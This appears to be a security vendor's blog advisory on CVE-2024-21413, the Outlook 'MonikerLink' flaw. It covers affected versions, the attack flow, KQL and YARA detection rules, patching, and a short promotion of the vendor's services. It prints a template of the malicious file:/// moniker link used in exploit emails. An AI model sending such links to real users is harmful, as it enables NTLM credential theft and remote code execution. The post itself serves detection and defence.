Featured image of post CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability
CVE

CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability

Discover how CVE-2024-21413 exposes Microsoft Outlook to stealthy remote attacks—learn how it works, how to detect it, and how to stay protected.

Introduction

In recent cybersecurity developments, the discovery of CVE-2024-21413 has raised significant concerns within the digital security community. This critical vulnerability, found within Microsoft Outlook, underscores the ever-present threat landscape that organizations face in safeguarding their information systems against sophisticated cyber threats.

Presenting CVE-2024-21413

CVE-2024-21413, also known as the #MonikerLink bug, is a severe security flaw with a CVSS score of 9.8, indicating its critical severity. Identified by Check Point Research, this vulnerability enables attackers to execute remote code and potentially gain unauthorized access to a victim’s system by exploiting specific hyperlink processing behaviors within Outlook.

Affected Versions

  • Microsoft Office 2016 before 16.0.0 to Version 2401 (Build 17231.20236)
  • Microsoft Office LTSC 2021 before 16.0.1 to Version 2108 (Build 14332.20637)
  • Microsoft 365 Apps for Enterprise before 16.0.1 to Version 2401 (Build 17231.20236)
  • Microsoft Office 2019 before 19.0.0 to Version 2401 (Build 17231.20236)

How it works?

Initially, the attacker crafts an email containing a malicious link formatted as:

<h1><a href="file:///$url!meeting">Meeting - click here.</a></h1>

When the victim clicks on the link, it exploits the MkParseDisplayName() API vulnerability in Microsoft Outlook, bypassing Protected View and not requiring any SMB server setup by the attacker. The exploit uses a moniker link that directs to a maliciously crafted .rtf file hosted on the attacker’s server. This file is automatically opened by Microsoft Word running in the background as a COM server, without displaying the normal Word user interface.

This process can lead to remote code execution on the victim’s machine by exploiting vulnerabilities in the way Word parses the .rtf file. If the exploit is successful, it can lead to the leaking of local NTLM credentials and allow the attacker to execute arbitrary code on the victim’s computer without their knowledge. This attack bypasses typical security measures like Protected View, making it a particularly stealthy vector for gaining control over the victim’s machine.

Successful exploitation of CVE-2024-21413

Figure 1 Successful exploitation of CVE-2024-21413 (source)

Detection

To detect and defend against the exploitation of CVE-2024-21413, the following methods can be utilized with KQL and Yara.

KQL Detection
Identifying vulnerable endpoints is key. This can be done with the following query:

let VulnerableEndpoints = DeviceTvmSoftwareVulnerabilities
| where CveId == "CVE-2024-21413"
| project DeviceId;
DeviceProcessEvents
| where FileName == "OUTLOOK.EXE"
| join DeviceNetworkEvents on DeviceId
| where DeviceId has_any(VulnerableEndpoints)
| where RemotePort == 445
| where RemoteIPType == "Public"
| where ActionType1 == "ConnectionSuccess"
| project Timestamp, DeviceName, AccountUpn, ActionType1, RemoteIP

Credit: Steven Lim

Yara Detection
The detection focuses on identifying emails that contain evidence of an attempt to exploit CVE-2024-21413 in Microsoft Outlook:

rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {
   meta:
      description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
      author = "X__Junior, Florian Roth"
      reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
      date = "2024-02-17"
      modified = "2024-02-19"
      score = 75
   strings:
      $a1 = "Subject: "
      $a2 = "Received: "
      $xr1 = /file:///\\[^"']{6,600}.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/
   condition:
      filesize < 1000KB
      and all of ($a*)
      and 1 of ($xr*)
}

Credit: Florian Roth

Remediation

Microsoft responded to the discovery of CVE-2024-21413 by releasing a critical security update on February 2024 Patch Tuesday. Users and organizations are strongly urged to apply this patch immediately to protect against potential exploits leveraging this vulnerability. The update aims to address and mitigate the underlying issue, preventing attackers from exploiting the flaw. Learn more

How Senthorus protects its customers

Most cybersecurity experts work in a 9-to-5 environment. Well, the bad news is that threat actors don’t. Critical vulnerabilities like CVE-2024-21413 can arise at any time, and not only during business hours. This is where Senthorus jumps in the breach, taking the lead in providing its customers with cyber defense made in Switzerland through full 24/7 monitoring of their infrastructure. On top of this, Senthorus’s registered customers benefit from Incident Response and Digital Forensics services, in direct collaboration with our analysts, available all year around, 24/7/365.

Summary

CVE-2024-21413 highlights the critical importance of maintaining up-to-date systems and the need for vigilant cybersecurity practices. By promptly applying available patches, educating users, and implementing advanced defensive measures, organizations can significantly reduce their exposure to this and similar vulnerabilities. The collective effort of the cybersecurity community in identifying, reporting, and mitigating such threats is crucial in maintaining the integrity and security of digital infrastructures worldwide.

References

© 2025 Senthorus Blog